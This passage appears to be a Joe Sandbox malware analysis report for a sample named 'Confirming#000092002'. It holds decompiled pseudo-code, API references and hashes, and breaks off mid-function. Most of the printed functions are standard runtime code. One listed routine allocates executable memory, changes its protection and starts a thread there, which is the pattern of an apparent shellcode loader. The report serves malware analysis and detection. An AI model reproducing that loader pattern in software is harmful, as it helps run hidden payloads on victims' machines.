Part of subcall function 00EAB234: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EAB2AB

_free.LIBCMT ref: 00EA802A
_free.LIBCMT ref: 00EA8031

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: b38908dd22eec24a26720ebacc34f396de7b52b0b783eefd7c9d43396a8a45b4
Instruction ID: 86923475de655e90e0f0d6195b607127a1513c8dbb11193c8c0c65cf4cb9cc5f
Opcode Fuzzy Hash: b38908dd22eec24a26720ebacc34f396de7b52b0b783eefd7c9d43396a8a45b4
Instruction Fuzzy Hash: 0EE02B2790691445F365273E7E81A6E13864BAB379F163316E420FE1D3EFA0F80A2165

Uniqueness

Uniqueness Score: -1.00%

Function 00EAB905 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00EAB905(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00EA9E27(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00EA999F(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00EA8B82(0);
				return _t35;
			}

0x00eab90b
0x00eab912
0x00eab917
0x00eab91b
0x00eab922
0x00eab928
0x00eab928
0x00eab92e
0x00eab930
0x00eab933
0x00eab933
0x00eab936
0x00eab938
0x00eab93e
0x00eab942
0x00eab947
0x00eab94b
0x00eab94f
0x00eab951
0x00eab954
0x00eab95a
0x00eab961
0x00eab965
0x00eab968
0x00eab96b
0x00eab96b
0x00eab96f
0x00eab972
0x00eab924
0x00eab924
0x00eab924
0x00eab974
0x00eab97f

APIs

Part of subcall function 00EA9E27: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EA9246,00000001,00000364,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA9E68

_free.LIBCMT ref: 00EAB974

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: dd3c5049decbaab8099cea803f0019154aa2000e803dd7771dc2aca6a42e3996
Instruction ID: bb5631ddc665e7be0d421a9e3aada99dac478e76792917fd73d453054a9754ac
Opcode Fuzzy Hash: dd3c5049decbaab8099cea803f0019154aa2000e803dd7771dc2aca6a42e3996
Instruction Fuzzy Hash: C3012672604316ABC3208F68D88199EFBD8FB4A3B0F145629E645BB6C1D3707C11C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00EA9E27 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00EA9E27(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xfe2dc0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00EA88F3();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00EA75D4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00EA893E(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00ea9e2d
0x00ea9e32
0x00ea9e40
0x00ea9e40
0x00ea9e46
0x00ea9e48
0x00ea9e48
0x00ea9e5f
0x00ea9e68
0x00ea9e70
0x00000000
0x00000000
0x00ea9e50
0x00ea9e52
0x00ea9e74
0x00ea9e79
0x00ea9e7f
0x00000000
0x00ea9e7f
0x00ea9e5b
0x00ea9e5d
0x00000000
0x00000000
0x00ea9e5d
0x00000000
0x00ea9e5f
0x00ea9e38
0x00ea9e3e
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EA9246,00000001,00000364,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA9E68

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 48b8f9f513486b128710322dc2cf799c0d01df7af652a2d8859b5b7fbf5ef1eb
Instruction ID: 9458951f0d2c5e44b9e8b8bfd8d38aff5a444e5127614bcffa7f4f09cc95a412
Opcode Fuzzy Hash: 48b8f9f513486b128710322dc2cf799c0d01df7af652a2d8859b5b7fbf5ef1eb
Instruction Fuzzy Hash: BFF0543160412466DB25EB6A9D05B9B77C9AF8B764B14E111AC05FE193DF20FC0196E1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3BDD Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00EA3BDD(intOrPtr* __ecx) {
				void* _t3;
				intOrPtr* _t5;

				_t5 = __ecx;
				GetCommandLineA(); // executed
				E00EA3A86(); // executed
				asm("int3");
				_t3 = _t5 + 4;
				if( *_t5 != _t3) {
					return E00EA7188( *_t5);
				} else {
					return _t3;
				}
			}

0x00ea3bdd
0x00ea3bdd
0x00ea3be3
0x00ea3be8
0x00ea3be9
0x00ea3bee
0x00ea3d1c
0x00ea3bf4
0x00ea3bf4
0x00ea3bf4

APIs

GetCommandLineA.KERNEL32 ref: 00EA3BDD

Part of subcall function 00EA3A86: VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00EA3AF0
Part of subcall function 00EA3A86: VirtualProtect.KERNELBASE(75C17E90,00000100,00000040,00000000), ref: 00EA3B0F
Part of subcall function 00EA3A86: CreateThread.KERNELBASE(00000000,00000000,75C17E90,00000000,00000000,00000000), ref: 00EA3B46
Part of subcall function 00EA3A86: MessageBoxA.USER32 ref: 00EA3B82
Part of subcall function 00EA3A86: MessageBoxA.USER32 ref: 00EA3B99

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: MessageVirtual$AllocCommandCreateLineProtectThread
String ID:
API String ID: 1227410803-0
Opcode ID: fda250ffe43106f0e3b26846f2d944362792a9648e08d143f6e7c5e8aef4f8c4
Instruction ID: 447f937fbdfa3e7ee3d1d71274d9294e2d9b43368acbdc96dcf90a4cd3b1f020
Opcode Fuzzy Hash: fda250ffe43106f0e3b26846f2d944362792a9648e08d143f6e7c5e8aef4f8c4
Instruction Fuzzy Hash: 4AC04C74015004DBCB056B34D8054547BF6BF5735A7F051EDF1566D832DB326A56DE10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EA1B39 Relevance: 12.2, APIs: 8, Instructions: 166
libraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00EA1B39(void* __ebx, intOrPtr __ecx, struct HINSTANCE__* __edi, void* __esi, void* __eflags) {
				CHAR* _t55;
				void* _t63;
				intOrPtr _t64;
				CHAR* _t65;
				struct HRSRC__* _t67;
				struct HINSTANCE__* _t68;
				void* _t69;
				CHAR* _t75;
				struct HINSTANCE__* _t83;
				void* _t89;
				struct HINSTANCE__* _t111;
				void* _t112;
				void* _t113;
				intOrPtr _t115;

				_t109 = __edi;
				_push(0x428);
				E00EB0282(0xeb083d, __ebx, __edi, __esi);
				_t89 = 0;
				_t55 =  *(_t112 + 8);
				_t111 = 0;
				 *(_t112 - 0x42c) =  *(_t112 + 0xc);
				 *(_t112 - 0x41c) = _t55;
				 *(_t112 - 0x428) =  *(_t112 + 0x10);
				 *(_t112 - 0x424) = 0;
				 *((intOrPtr*)(_t112 - 4)) = 0;
				 *((intOrPtr*)(_t112 - 0x430)) = __ecx;
				 *((intOrPtr*)(_t112 - 0x434)) = 0;
				 *(_t112 - 0x418) = 0;
				 *((char*)(_t112 - 4)) = 1;
				if(_t55 == 0) {
					L30:
					__eflags = _t89 - _t112 - 0x414;
					if(_t89 != _t112 - 0x414) {
						E00EA3D14(_t112 - 0x418);
					}
					__eflags = _t111;
					if(_t111 != 0) {
						do {
							_t109 = _t111->i;
							_t111 = _t109;
							E00EA7188(_t111);
							__eflags = _t109;
						} while (_t109 != 0);
					}
				} else {
					 *(_t112 - 0x420) = E00EA75E7(_t55) + 1;
					_t63 = E00EA1181(_t112 - 0x420, E00EA75E7(_t55) + 1);
					_t115 = _t113 + 4;
					if(_t63 < 0) {
						L29:
						_t89 =  *(_t112 - 0x418);
						goto L30;
					} else {
						_t109 =  *(_t112 - 0x420);
						_t120 = _t109 - 0x400;
						if(_t109 > 0x400 || E00EA11AE(0, _t109, _t109, 0, _t120) == 0) {
							_t64 = E00EA3CD7(_t112 - 0x424, _t111, _t109);
							_t111 =  *(_t112 - 0x424);
						} else {
							E00EB02F0(_t109);
							 *((intOrPtr*)(_t112 - 0x10)) = _t115;
							_t64 = _t115;
						}
						_t65 = E00EA1251(_t64,  *(_t112 - 0x41c), _t109, 3);
						 *(_t112 - 0x41c) = _t65;
						if(_t65 == 0) {
							goto L29;
						} else {
							_t109 = LoadLibraryExA(_t65, _t89, 0x60);
							 *(_t112 - 0x420) = _t109;
							if(_t109 != 0) {
								L10:
								_t67 = FindResourceA(_t109,  *(_t112 - 0x42c),  *(_t112 - 0x428));
								 *(_t112 - 0x42c) = _t67;
								__eflags = _t67;
								if(_t67 != 0) {
									_t68 = LoadResource(_t109, _t67);
									 *(_t112 - 0x428) = _t68;
									__eflags = _t68;
									if(_t68 == 0) {
										goto L11;
									} else {
										_t75 = SizeofResource(_t109,  *(_t112 - 0x42c));
										 *(_t112 - 0x41c) = _t75;
										_t30 =  &(_t75[1]); // 0x1
										_t98 = _t30;
										__eflags = _t30 - _t75;
										if(_t30 >= _t75) {
											 *((char*)(_t112 - 4)) = 2;
											__eflags = E00EA3D42(_t98) - 0x400;
											if(__eflags <= 0) {
												 *(_t112 - 0x418) = _t112 - 0x414;
											} else {
												E00EA3D1D(_t112 - 0x418, _t111, __eflags, _t76);
											}
											 *((intOrPtr*)(_t112 - 4)) = 1;
											__eflags =  *(_t112 - 0x418);
											if( *(_t112 - 0x418) == 0) {
												goto L14;
											} else {
												E00EA1285(E00EA1105( *(_t112 - 0x418),  *(_t112 - 0x41c),  *(_t112 - 0x428),  *(_t112 - 0x41c)));
												 *( *(_t112 - 0x418) +  *(_t112 - 0x41c)) = _t89;
												_t69 = E00EA2C50(_t89, _t112 - 0x434,  *(_t112 - 0x41c), __eflags,  *(_t112 - 0x418),  *((intOrPtr*)(_t112 + 0x14)));
												goto L21;
											}
										} else {
											L14:
											_t89 = 0x8007000e;
										}
									}
								} else {
									L11:
									_t69 = E00EA12C0();
									L21:
									_t89 = _t69;
								}
								__eflags = _t109;
								if(_t109 != 0) {
									FreeLibrary(_t109);
								}
							} else {
								_t83 = LoadLibraryExA( *(_t112 - 0x41c), _t89, 2);
								_t109 = _t83;
								 *(_t112 - 0x420) = _t83;
								if(_t109 != 0) {
									goto L10;
								} else {
									_t89 = E00EA12C0();
								}
							}
							if( *(_t112 - 0x418) != _t112 - 0x414) {
								E00EA3D14(_t112 - 0x418);
							}
							if(_t111 != 0) {
								do {
									_t109 = _t111->i;
									_t111 = _t109;
									E00EA7188(_t111);
								} while (_t109 != 0);
							}
						}
					}
				}
				return E00EB01D4(_t89, _t109, _t111);
			}

0x00ea1b39
0x00ea1b39
0x00ea1b43
0x00ea1b4b
0x00ea1b4d
0x00ea1b50
0x00ea1b52
0x00ea1b5b
0x00ea1b61
0x00ea1b67
0x00ea1b6d
0x00ea1b70
0x00ea1b76
0x00ea1b7c
0x00ea1b82
0x00ea1b88
0x00ea1d84
0x00ea1d8a
0x00ea1d8c
0x00ea1d94
0x00ea1d94
0x00ea1d99
0x00ea1d9b
0x00ea1d9d
0x00ea1d9d
0x00ea1da0
0x00ea1da2
0x00ea1da8
0x00ea1da8
0x00ea1d9d
0x00ea1b8e
0x00ea1b9d
0x00ea1ba3
0x00ea1ba8
0x00ea1bad
0x00ea1d7e
0x00ea1d7e
0x00000000
0x00ea1bb3
0x00ea1bb3
0x00ea1bb9
0x00ea1bbf
0x00ea1be1
0x00ea1be6
0x00ea1bcc
0x00ea1bce
0x00ea1bd3
0x00ea1bd6
0x00ea1bd6
0x00ea1bf7
0x00ea1bfc
0x00ea1c04
0x00000000
0x00ea1c0a
0x00ea1c14
0x00ea1c16
0x00ea1c1e
0x00ea1c47
0x00ea1c54
0x00ea1c5a
0x00ea1c60
0x00ea1c62
0x00ea1c70
0x00ea1c76
0x00ea1c7c
0x00ea1c7e
0x00000000
0x00ea1c80
0x00ea1c87
0x00ea1c8d
0x00ea1c93
0x00ea1c93
0x00ea1c96
0x00ea1c98
0x00ea1ca4
0x00ea1cad
0x00ea1cb2
0x00ea1cc8
0x00ea1cb4
0x00ea1cbb
0x00ea1cbb
0x00ea1cce
0x00ea1cf2
0x00ea1cf9
0x00000000
0x00ea1cfb
0x00ea1d16
0x00ea1d2d
0x00ea1d3c
0x00000000
0x00ea1d3c
0x00ea1c9a
0x00ea1c9a
0x00ea1c9a
0x00ea1c9a
0x00ea1c98
0x00ea1c64
0x00ea1c64
0x00ea1c64
0x00ea1d41
0x00ea1d41
0x00ea1d41
0x00ea1d43
0x00ea1d45
0x00ea1d48
0x00ea1d48
0x00ea1c20
0x00ea1c29
0x00ea1c2f
0x00ea1c31
0x00ea1c39
0x00000000
0x00ea1c3b
0x00ea1c40
0x00ea1c40
0x00ea1c39
0x00ea1d5a
0x00ea1d62
0x00ea1d62
0x00ea1d69
0x00ea1d6b
0x00ea1d6b
0x00ea1d6e
0x00ea1d70
0x00ea1d76
0x00ea1d6b
0x00ea1d7a
0x00ea1c04
0x00ea1bad
0x00ea1dbc

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00EA1B43
__alloca_probe_16.LIBCMT ref: 00EA1BCE
LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?,?,?), ref: 00EA1C0E
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00EA1C29

Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1

FindResourceA.KERNEL32(00000000,?,?), ref: 00EA1C54
LoadResource.KERNEL32(00000000,00000000), ref: 00EA1C70
SizeofResource.KERNEL32(00000000,?), ref: 00EA1C87
FreeLibrary.KERNEL32(00000000), ref: 00EA1D48

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: LibraryLoadResource$__alloca_probe_16$FindFreeH_prolog3_catch_Sizeof
String ID:
API String ID: 2027223938-0
Opcode ID: 8073a3192f59dfd40ec7a056fab6466ad91e676cc424f78f4fc836502de2c9bd
Instruction ID: cb49504d29a7c8c28226c216853cdad480b5c9844fd22314f0461820e7e99eb2
Opcode Fuzzy Hash: 8073a3192f59dfd40ec7a056fab6466ad91e676cc424f78f4fc836502de2c9bd
Instruction Fuzzy Hash: 0C6161B1A002189BCB259F24CC807EDB7F5AF4E354F5450E9E609BB251DB30AE858F69

Uniqueness

Uniqueness Score: -1.00%

Function 00EA71A3 Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EA71A3(void* __edx) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t20;
				void* _t22;
				long _t23;
				char _t24;
				long _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				long _t46;
				char _t47;
				signed int _t50;
				void* _t51;

				_t41 = __edx;
				_t18 =  *0xeb9008; // 0x64e1d101
				_v8 = _t18 ^ _t50;
				_t20 = 4;
				E00EB02C0(_t20);
				_t22 = _t51;
				_v16 = _t22;
				_t23 = VirtualQuery(_t22,  &_v52, 0x1c);
				_t53 = _t23;
				if(_t23 == 0) {
					L12:
					_t24 = 0;
					__eflags = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t37 = _v88.dwPageSize;
					_t47 = 0;
					_v12 = 0;
					if(E00EA9A78(_t53,  &_v12) != 0 && _v12 > 0) {
						_t47 = _v12;
					}
					_t44 =  ~_t37;
					_t46 = _t47 - 0x00000001 + _t37 & _t44;
					if(_t46 != 0) {
						_t46 = _t46 + _t37;
					}
					_t30 = _t37 + _t37;
					if(_t46 < _t30) {
						_t46 = _t30;
					}
					_t42 = (_t44 & _v16) - _t46;
					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
						_t24 = 1;
					}
				}
				return E00EA403C(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
			}

0x00ea71a3
0x00ea71ab
0x00ea71b2
0x00ea71ba
0x00ea71bb
0x00ea71c0
0x00ea71c9
0x00ea71cc
0x00ea71d2
0x00ea71d4
0x00ea7254
0x00ea7254
0x00ea7254
0x00ea71d6
0x00ea71d9
0x00ea71e0
0x00ea71e6
0x00ea71ec
0x00ea71ef
0x00ea71f9
0x00ea7200
0x00ea7200
0x00ea7206
0x00ea720a
0x00ea720c
0x00ea720e
0x00ea720e
0x00ea7210
0x00ea7215
0x00ea7217
0x00ea7217
0x00ea721f
0x00ea7225
0x00000000
0x00ea724f
0x00ea7251
0x00ea7251
0x00ea7225
0x00ea7267

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00EA71CC
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00EA71E0
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00EA7230
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00EA7245

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 1c715cdc83b2f5e712886c89299617e31ffc559478dd4273e449b42caa2bb896
Instruction ID: 20cb27d5c608098a68021ba901e5053c426bd7d7562aae97e253e93e4f41569e
Opcode Fuzzy Hash: 1c715cdc83b2f5e712886c89299617e31ffc559478dd4273e449b42caa2bb896
Instruction Fuzzy Hash: F821C7B2E44118ABCB20DBE9DC85BEFB7B8EF49754F010165F955FB140E634A904C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA4959 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00EA4959(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00EA4B51(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00EA5210(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00EA5210(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00EA4B51(_t49);
				}
				return _t49;
			}

0x00ea4959
0x00ea4959
0x00ea4959
0x00ea496d
0x00ea496f
0x00ea4972
0x00ea4972
0x00ea4976
0x00ea497b
0x00ea4993
0x00ea4999
0x00ea499f
0x00ea49a5
0x00ea49ab
0x00ea49b1
0x00ea49b7
0x00ea49be
0x00ea49c5
0x00ea49cc
0x00ea49d3
0x00ea49da
0x00ea49e1
0x00ea49e2
0x00ea49eb
0x00ea49f1
0x00ea49f4
0x00ea49fa
0x00ea4a09
0x00ea4a15
0x00ea4a20
0x00ea4a27
0x00ea4a2e
0x00ea4a39
0x00ea4a41
0x00ea4a4a
0x00ea4a4c
0x00ea4a4f
0x00ea4a51
0x00ea4a5b
0x00ea4a63
0x00ea4a69
0x00000000
0x00ea4a70
0x00ea4a73

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EA4965
IsDebuggerPresent.KERNEL32 ref: 00EA4A31
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA4A51
UnhandledExceptionFilter.KERNEL32(?), ref: 00EA4A5B

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 08ab8063b1b4e91da5a4f0c4461cfe459e6a2207fbea1eea11c3ed7fecb7392a
Instruction ID: 661f399b95d10e8a89591b3c8a4227ed0c8e243b30e63f11470d381ef5828001
Opcode Fuzzy Hash: 08ab8063b1b4e91da5a4f0c4461cfe459e6a2207fbea1eea11c3ed7fecb7392a
Instruction Fuzzy Hash: FF311AB5D412189BDF10DFA5D989BCDBBF8AF08304F1041DAE40DAB2A0EB709B849F55

Uniqueness

Uniqueness Score: -1.00%

Function 00EA72E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00EA72E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
